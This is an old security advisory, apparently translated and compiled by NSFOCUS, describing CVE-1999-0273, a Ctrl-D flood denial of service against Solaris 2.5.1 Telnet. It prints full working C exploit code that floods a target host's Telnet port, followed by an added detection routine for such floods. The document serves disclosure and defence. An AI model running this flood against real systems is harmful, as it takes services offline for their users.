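Solaris Telnet Service Remote Ctrl-D Character Denial-of-Service Vulnerability

Published: 1997-12-13
Updated: 1997-12-13

Affected systems:
Sun Solaris 2.5.1
Description:
CVE(CAN) ID: CVE-1999-0273

Solaris is a commercial UNIX operating system developed and maintained by Sun Microsystems.

The Telnet service shipped with Solaris contains an implementation flaw. A remote attacker can exploit it to make the machine consume large amounts of memory until the system stops responding, resulting in a denial of service.


<*Source: Jason Zapman II (zapman@CC.GATECH.EDU)
  *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Jason Zapman II (zapman@CC.GATECH.EDU) provided the following test code: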


    /*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

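    #include <stdio.h>      /* printf */
    #include <stdlib.h>     /* exit */
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <strings.h>    /* bzero, bcopy */
    #include <unistd.h>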

    #define BUFSIZE 100
    #define DOTS

    void catchit(void)
    {
        printf("\nCaught SIGPIPE -- your link may be too slow.\n");
        exit(1);
    }

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  /* socket() returns -1 on failure */
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        bzero(&sin,sizeof(sin));
        bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n",argv[1]);
        write(s,kludge_telopt,21);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (write(s,nastybuf,BUFSIZE) != -1) {

    #ifdef DOTS
            write(STDOUT_FILENO,".",1);
    #endif
        }
    }
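
The traffic produced by the test code above has a simple signature: a few Telnet option replies followed by an unbroken stream of ^D (ASCII 4) bytes. The following detection sketch is an added example, not part of the original advisory or of Sun's code; the function names and the threshold of 64 are assumptions to be tuned per site.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* Telnet command bytes (RFC 854). */
enum { T_SE = 240, T_SB = 250, T_WILL = 251, T_DONT = 254, T_IAC = 255 };
#define CTRL_D 4
#define RUN_THRESHOLD 64 /* assumed alert threshold; tune per site */

/* Longest run of consecutive ^D data bytes in a client-to-server Telnet stream.
 * IAC sequences are skipped without resetting the run, so negotiation cannot hide a flood. */
size_t longest_ctrl_d_run(const unsigned char *p, size_t n)
{
    size_t i = 0, run = 0, best = 0;
    while (i < n) {
        if (p[i] == T_IAC && i + 1 < n) {
            unsigned char c = p[i + 1];
            if (c >= T_WILL && c <= T_DONT) { i += 3; continue; } /* IAC verb opt */
            if (c == T_SB) {                  /* subnegotiation: skip to IAC SE */
                i += 2;
                while (i + 1 < n && !(p[i] == T_IAC && p[i + 1] == T_SE)) i++;
                i += 2; continue;
            }
            if (c != T_IAC) { i += 2; continue; } /* other two-byte command */
            i++;                              /* IAC IAC: literal 0xFF data byte */
        }
        if (p[i] == CTRL_D) { if (++run > best) best = run; }
        else run = 0;
        i++;
    }
    return best;
}

int is_ctrl_d_flood(const unsigned char *p, size_t n)
{
    return longest_ctrl_d_run(p, n) >= RUN_THRESHOLD;
}

int main(void)
{
    /* Constructed sample: 21 bytes of option replies, then 100 ^D bytes. */
    unsigned char flood[121] = {255,252,24, 255,253,3, 255,252,35, 255,252,31,
                                255,252,36, 255,252,39, 255,253,1};
    const unsigned char normal[] = "ls -l\r\n\004"; /* constructed: one ^D */
    memset(flood + 21, CTRL_D, 100);
    printf("flood alert=%d\n", is_ctrl_d_flood(flood, sizeof flood));
    printf("normal alert=%d\n", is_ctrl_d_flood(normal, sizeof normal - 1));
    return 0;
}
```

A legitimate session sends at most a handful of ^D bytes, so a long run on port 23 is a reasonable trigger for rate limiting or dropping the connection in front of an unpatched host.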

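Recommendation:
Vendor patch:

Sun
---
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: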

http://sunsolve.sun.com/security

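This vulnerability entry was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.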